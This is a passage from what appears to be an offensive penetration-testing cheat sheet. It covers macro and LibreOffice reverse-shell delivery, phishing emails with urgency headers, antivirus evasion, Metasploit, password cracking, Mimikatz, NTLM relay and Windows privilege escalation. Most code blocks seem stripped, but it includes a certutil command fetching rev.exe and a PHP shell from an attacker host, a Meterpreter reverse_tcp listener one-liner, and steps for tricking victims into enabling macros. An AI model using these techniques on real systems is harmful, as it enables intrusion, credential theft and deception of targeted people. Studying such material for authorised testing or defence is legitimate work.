1. Get the Reverse Shell: in this step, after you successfully trigger the JNDI injection (from Step 2), you deliver a reverse shell payload or any other malicious code to execute commands on the target server.

3.10 Exploiting CVEs

4. 👥 Client-Side Attacks

4.1 MACROS

Auto-Executing PowerShell on Document Open

Passing Command as a String Variable

PowerShell Download Cradle with PowerCat Reverse Shell

Base64 Payload Encoding

Python Script to Split Base64 PowerShell Command

Macro for PowerShell Reverse Shell using Encoded Command

4.2 Windows Library Files

Running the WebDav Server in Kali

Cradle Download and Execute Script via LNK File

Example .Library-ms File Configuration

4.3 Advanced Exploitation

String Concatenation to Bypass Signature Detection

Executing Encoded Commands Without Direct PowerShell Reference

Evading Antivirus Detection

Embedding JavaScript Payloads in HTML Documents

Using Obfuscated JavaScript

Mounting WebDav Share as Network Drive (Windows)

4.4 Send Emails

4.4.1 Normal Email

This command sends a regular email with an attachment and a subject.

• Purpose: this is a basic email with an attachment sent through an SMTP server.

• Key parameters:

  • -t: Recipient's email.

  • --from: Sender's email.

  • --attach: File to attach (e.g., a PDF or spreadsheet).

  • --server: SMTP server to send the email.

  • --body: Text file containing the email body.

  • --header: Adds custom headers like "Subject".

  • --suppress-data: Hides the email body in the output (for cleaner logs).

4.4.2 Email with Authentication

This is useful when sending emails through an SMTP server that requires user authentication (like many corporate or public SMTP servers).

• Purpose: sends an email with SMTP authentication using a username and password.

• Additional Parameters:

  • --auth LOGIN: Specifies authentication type.

  • --auth-user: Username for the SMTP server.

  • --auth-password: Password for the SMTP server.

4.4.3 Email with Custom Headers for Social Engineering

This email is designed to manipulate the recipient into thinking the message is urgent, increasing the chance they will open it. Common in phishing attacks.

• Purpose: sends an email with custom headers for social engineering purposes.

• Additional Parameters:

  • X-Priority: Marks the email as high priority (1 being the highest).

  • Importance: Marks the email as important.

4.4.4 Alternative Tool sendemail

This command sends an email with an attachment, similar to the SWAKS command. It’s often used for simple email automation or local mail servers.

• Purpose: sendemail is another tool for sending emails from the command line. It’s simpler but doesn’t offer as many features as SWAKS.

• Key Parameters:

  • -f: Sender's email address.

  • -t: Recipient's email address.

  • -s: SMTP server and port (192.168.203.140:25).

  • -u: Subject of the email.

  • -m: Message body of the email.

  • -a: Attachment (exploit.ods in this case).

4.4.5 Comparison Summary

4.5 Exploiting LibreOffice Macros for Payload Execution

4.5.1 Linux Targets

1. Generate a Linux-Compatible Reverse Shell

-f elf: ELF format for Linux executables. The ELF (Executable and Linkable Format) is the standard binary format for Linux executables. This ensures the payload is runnable on most Linux distributions.

-o shell.elf: Save the payload as shell.elf.

1. Create a Malicious LibreOffice Macro: libreOffice supports Basic macros, which can execute system commands. The example below downloads and executes the payload on the target.

   1. Open LibreOffice Writer and press ALT + F11 to open the macro editor.

   2. Create a new macro under My Macros > Standard > Module1.

1. Host the Payload on a Web Server: use Python’s HTTP server to serve the payload.

1. Save the LibreOffice Document with Macro: save the document as update.odt with the embedded macro. LibreOffice macros are not executed automatically—social engineering is needed to trick the target into enabling macros.

2. Setup a Netcat Listener:

1. Deliver the Malicious Document via Email: use swaks (or other tool from the Section 4.4.) to send the email with the malicious document attached:

4.5.2 Windows Targets

1. Generate the Reverse Shell Payload with MSFvenom:

-f hta-psh: format the output as a PowerShell payload embedded in an HTA file. This format creates an HTA (HTML Application) file containing a PowerShell script. HTA files are often misused in attacks because they can execute scripts directly when opened on the victim’s machine. PowerShell is ideal for this type of payload because it’s a built-in scripting engine in Windows, making it less likely to be blocked.

-o evil.hta: save the payload as evil.hta. This option saves the generated payload as evil.hta. You can change the name, but it is critical that the file ends with the .hta extension, which ensures it behaves as an HTA application when opened.

Other Formats for Payloads with msfvenom: these formats allow versatility depending on the delivery method and endpoint constraints. For example, a PowerShell payload (ps1) could be useful if you are embedding the script in a macro-enabled Word document.

• exe: Generate an executable (-f exe -o evil.exe)

• vbs: Use a Visual Basic script (-f vbs -o evil.vbs)

• ps1: Generate a pure PowerShell script (-f ps1 -o script.ps1)

• dll: Create a malicious DLL (-f dll -o payload.dll)

1. Extract and Encode the Payload: open the generated HTA file (evil.hta) and copy the payload (it is the Base64 encoded string). Use the following Python script to divide the payload into 50-character chunks (easier to embed within a macro).

1. Create the LibreOffice Spreadsheet with Macro Code:

   1. Open LibreOffice Calc and create a new spreadsheet (save it as exploit.ods).

   2. Enable Macros:

      • Go to Tools → Options → LibreOffice → Security → Macro Security.

      • Set security to Medium or Low to allow macros to run.

   3. Insert the Macro Code:

      • Go to Tools → Macros → Organize Macros → LibreOffice Basic.

      • Click New, give it a name (e.g., Exploit), and paste the macro code below.

2. Macro Code Example: this macro concatenates the encoded payload chunks into a string and executes it using PowerShell.

Replace <INSERT_YOUR_PAYLOAD_CHUNKS> with the output from the Python script.

Explanation: The macro creates a PowerShell command to run the payload (-nop for non-interactive, -w hidden for stealth) and executes it using the Shell function.

Shell Command: choosing between Shell Str, 1 and Shell(Str) often depends on the specific requirements of the script and how the executed command should behave. In the case of exploiting LibreOffice macros, using Shell Str, 1 provides greater control and is a more reliable approach for executing payloads in a way that is likely to succeed in various environments. The Shell function can also be used with just one argument, but this would imply that it runs the command without any specific window display options; this means it might not control how the command window behaves (e.g., hidden or minimized), which might not be desirable for a payload execution context.

1. Configure the Listener on the Attacker Machine:

1. Deliver the Spreadsheet to the Target: assuming you have a valid SMTP server available for testing or phishing.

Send the exploit.ods spreadsheet to the victim via email or other means. Instruct the victim to open the spreadsheet and enable macros when prompted.

1. Post-Exploitation Considerations

• Upgrade to a Stable Shell:

• Gather System Info:

• Persistence and Data Exfiltration: consider planting additional backdoors or gathering sensitive information. For example: cd C:\xampp\htdocs && certutil -urlcache -split -f http://[attacker_ip]/rev.exe && certutil -urlcache -split -f http://[attacker_ip]/shell.pHp

5. 🛡️ Antivirus Evasion & Metasploit

5.1 In-Memory Injection with PowerShell Script

5.1.1 Payload

5.1.2 Script

Alternative script from this GitHub, in case we want to use something different.

5.2 Shellter (Automatic Tool)

• Installation: apt-cache search shellter && sudo apt install shellter

• Installation of wine (required to run shellter): sudo apt install wine and execute this one with sudo su: dpkg --add-architecture i386 && apt-get update && apt-get install wine32

• One-liner to set a Meterpreter listener: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST [IP];set LPORT [PORT];run;"

• Help for troubleshooting: https://forum.manjaro.org/t/wine-could-not-load-kernel32-dll-status-c0000135/69811

• Another similar tools are Veil and Guide.

5.3 Metasploit

Metasploit Usage

1. Starting the Metasploit database

1. Create workspaces: workspace -a [nameToGive]

2. Search for a specific type of module: search type:auxiliary smb

3. Set payload information using the database, in this case the hosts: services -p 445 --rhosts

4. Set a listener

Msfvenom Usage

5.4 Msfvenom

5.4.1 Listeners

5.4.2 Main Payloads

5.4.3 Additional Payloads

6. 🔐 Password Attacks

6.1 Brute-Force

6.2 Spraying Credentials

• Hydra

• Crackmapexec

6.3 Crack Files

6.3.1 Office Files

6.3.2 PDF Files

1. Extract Hashes from PDF Files

1. Crack PDF Password Using John the Ripper

1. Crack PDF Password Using pdfcrack (Alternative)

6.3.3 ZIP Files

1. Extract Hashes from ZIP Files

1. Crack ZIP Password

1. Brute-Force ZIP Password (Alternative)

6.4 HTTP POST Login Form

The three parameters for the http-post-form:

• Login page URI: /<login_uri>

• POST request username and password: <user_field>=<username>&<pass_field>=^PASS^, for example: fm_usr=user&fm_pwd=^PASS^

• Login failed identifier: <failure_message>, for example Login failed. Invalid

6.5 HTTP GET (Basic Authentication)

6.6 Calculate cracking time

• Calculating the keyspace for a password of length 5

• Example

6.7 Mutating wordlists

Hashcat list of rules

6.8 Hashcat Formats for Cracking

6.9 Password Managers

Finding KeePass Database

Cracking KeePass Database

Opening KeePass Database (after cracking it)

6.10 SSH Passphrases

Converting and Cracking SSH Key Passphrase

6.11 Linux Users Hashes

Crack hashes from /etc/shadow file

6.12 Mimikatz Commands

6.12.1 Do Not Require Credentials

6.12.2 Require Credentials

6.12.3 Mimikatz One-Liners

When using tools like Evil-WinRM or unstable reverse shells, running mimikatz can be problematic. In such cases, Mimikatz one-liner commands offer an effective workaround. Here are different approaches:

• (Recommended Option) Using Mimikatz One-Liners:

• Running Mimikatz with Command Redirection: ensures output is saved to a file for later retrieval if the shell disconnects.

• Running Mimikatz via PowerShell Encoded Commands:

• One-Liner with Remote Execution:

• Using Mimikatz with Minimal Output:

6.13 NTLM

1. Set SeDebugPrivilege access (needed to use Mimikatz):

1. Elevate to SYSTEM user privileges and dump credentials

1. Crack the NTLM hash

1. If uncrackable, consider Pass-The-Hash

6.14 Pass-The-Hash NTLM

1. Dump the SAM Database:

1. Authenticate

6.15 Cracking Net-NTLMv2

Parameters:

• <interface>: Network interface to listen on (e.g., eth0, wlan0, etc.).

• <responder_ip>: IP address of the machine running Responder.

• <victim_ip>: IP address of the victim machine.

• <DOMAIN>: Domain of the user.

• <hash_file>: File containing the captured NTLMv2 hash.

1. Start Responder Run the Responder tool to capture Net-NTLMv2 hashes. Ensure the victim requests a file that does not exist to generate the necessary traffic.

2. Victim Request Example The victim's request to the Responder server can be through various services. For instance, an HTTP request might look like this:

3. Capture Example Output After the victim's request, you should see output similar to this:

4. Crack the Hash Use Hashcat to crack the captured NTLMv2 hash. The hashcat mode for Net-NTLMv2 is 5600.

6.16 Relaying Net-NTLMv2

1. Start Impacket ntlmrelayx Use the Impacket ntlmrelayx tool to capture NTLMv2 requests and relay them to a target. Replace <target_ip> with the IP address of the machine where you want to execute the command.

2. Expected Output After Victim Request Once the victim makes a request, you should see output like this indicating that the relay was successful and the command was executed on the target:

3. Setup Netcat Listener

4. Force Victim Request (Example) Trigger the victim machine to make a request to the Responder server, which can be done through various means such as Remote Code Execution (RCE) in a web application:

6.17 Online Tools

• CrackStation

• Hashes

• HashIdentifier

6.18 Default Credentials

6.18.1 Database Tool

This is one of the most useful tools I found for this purpose, keep im mind that you should always also check in the internet for other possible credentials.

• Tool: https://github.com/ihebski/DefaultCreds-cheat-sheet

• Installation

• Usage

• Export Credentials to Files (could be used for brute force attacks)

• Update Records

• Run Credentials Through Proxy

6.18.2 Most Common Credentials

6.18.3 Strategies for Effective Password Guessing

1. Common Combinations: Start with widely used username/password combinations.

2. Box-Specific Credentials: Test credentials that might be related to the target machine or service (e.g., USERK:USERK).

3. Metadata Extraction: Use tools like exiftool to find usernames and passwords embedded in metadata.

4. Brute Force and Dictionary Attacks: For more comprehensive password guessing, use tools that can automate these attacks with a wordlist.

6.18.4 Tips

• Default Password Lists: Utilize common default password lists, such as those provided by security tools or databases like SecLists.

• Vendor Documentation: Check vendor documentation or forums for default credentials specific to certain devices or software.

• Device Manuals: Refer to device manuals or configuration guides for default credentials used in network devices or applications.

6.19 Recommended Wordlists

• Cracking hashes and passwords: /usr/share/wordlists/rockyou.txt.

• DNS Enumeration: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt.

• SNMP Community Strings Brute-Forcing: /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt.

• Users Enumeration (ideal to find possible users for attacks like ASPRoasting, Kerbrute, Kerberoasting, and others): /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

• Web Directory Enumeration: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt, /usr/share/dirb/wordlists/common.txt and /usr/share/dirb/wordlists/big.txt.

• Web File Enumeration: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt.

6.20 NetExec (NCX)

NetExec (NCX) is a modern replacement for CrackMapExec, offering a variety of new modules for enhanced functionality. Explore the GitHub repository for the source code and updates. More detailed usage and module information are available in the WiKi documentation.

6.20.1 Enumeration

• Initial Enumeration

• Null Authentication

• Guest Authentication

• List Shares

• List Groups

• List Usernames

6.20.2 Spraying

• Available Protocols

• Password Formating for Special Characters:

• Password Spraying: when using usernames or passwords that contain special symbols (especially exclaimation points!), wrap them in single quotes to make your shell interpret them as a string.

• Password Spraying Without Bruteforce: can be usefull for protocols like WinRM and MSSQL; this option avoid the bruteforce when you use files (-u file -p file).

• Local Authentication

• Using Kerberos: use -k if you suspect Kerberos tickets are available in the environment, e.g., for domain-joined systems or when running with domain credentials.

6.20.3 SMB

• All In One

• Spider_plus Module

• Dump a specific file

6.20.4 FTP

• List folders and files

• List files inside a folder

• Retrieve a specific file

6.20.5 LDAP

• Enumerate users using ldap

• All In One

• Kerberoast

• ASREProast

6.20.6 MSSQL

• Authentication

• Execute commands using xp_cmdshell: -X for powershell and -x for cmd

• Get a file

6.20.7 Secrets Dump

• Dump SAM

• Dump LSA Secrets

• Dump NTDS.dit

• Dump LSASS

• gMSA

• Group Policy Preferences (GPP)

• Dump LAPS v1 and v2 password

• Dump dpapi credentials

• Dump WiFi credentials

• Dump KeePass

6.20.8 Bloodhound

1. Perform these changes in the configuration file ~/.nxc/nxc.conf:

1. Once the above is setup you can get your information

6.20.9 Useful Modules

6.20.9.1 Webdav

Checks whether the WebClient service is running on the target

6.20.9.2 Veeam

Extracts credentials from local Veeam SQL Database

6.20.9.3 slinky

Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions

6.20.9.4 ntdsutil

Dump NTDS with ntdsutil

6.20.9.5 ldap-checker

Checks whether LDAP signing and binding are required and/or enforced

6.20.9.6 Check if the DC is vulnerable to zerologon, petitpotam, nopac

6.20.9.7 Check the MachineAccountQuota

6.20.9.8 ADCS Enumeration

6.20.9.9 Retrieve MSOL Account Password

6.20.9.10 NTLM Relay Attack

Check for hosts that have SMB signing disabled, and if so capture the NTLM and perform an NTLM Relay Attack:

1. Identify if Host is Vulnerable:

1. Start Responder Server

1. Perform Relay Attack: by using the captured hashes in Responder (if applicable).

1. Perform Actions on Objective: access shares or execute commands or do pass-the-hash attacks or try to crack the NTLM hash, this is now whatever you want to do.

6.20.10 Impersonate logged-on Users

You need at least local admin privilege on the remote target.

1. Enumerate logged-on users on the target:

1. Execute commands on behalf of other users:

6.20.11 Multi-Domain Environment

Where FILE is a file with usernames in this format:

Script to create a list of [domains]\[users]:

7. 🪟 Windows Privilege Escalation

7.1 Enumeration

7.2 Finding Files in Directories

Enumerating Everything the Users Folder Has

Searching for Password Manager Databases

Searching for Sensitive Information in the XAMPP Directory

Finding Unusual Files and Directories

Finding files with SYSTEM or Administrators group permissions

Finding Large Files

Finding Executable Files

Finding Directories Writable by All Users

Using Runas to Execute CMD as a Different User

7.3 PowerShell Goldmine (Logs)

Command History

Finding PSReadline History File Path

Finding and Viewing the Goldmine for All User (Script)

7.4 Abusing Privileges

7.4.1 Check Assigned Privileges

Keep in mind that tokens that appears as Disabled can be enabled, and we can also abuse both Enabled and Disabled tokens.

7.4.2 Enable All Tokens

If you have tokens disables, you can use the script EnableAllTokenPrivs.ps1 below to enable all the tokens; we could also use as an alternative the script in this post.

7.4.3 Token Privileges Table

7.4.4 FullPowers.exe

Sometimes we get access to a machine with what seems to be a privilege service account but this account has almost non or very little permissions enabled, in this case we can use this tool, FullPowers.exe, to automatically recover the default privilege set of a service account, including the permissions SeAssignPrimaryToken and SeImpersonate which are very popular to escalate privileges.

1. Start the Python Server:

1. Bring the Executable to the victim:

1. Run the Executable:

1. Verify that you have now an elevated set of privileges:

1. Execute your Malicious Actions: if you have now, for example, the permission SeImpersonate you could use PrintSpoofer.exe or GodPotato.exe to elevate your privileges.

2.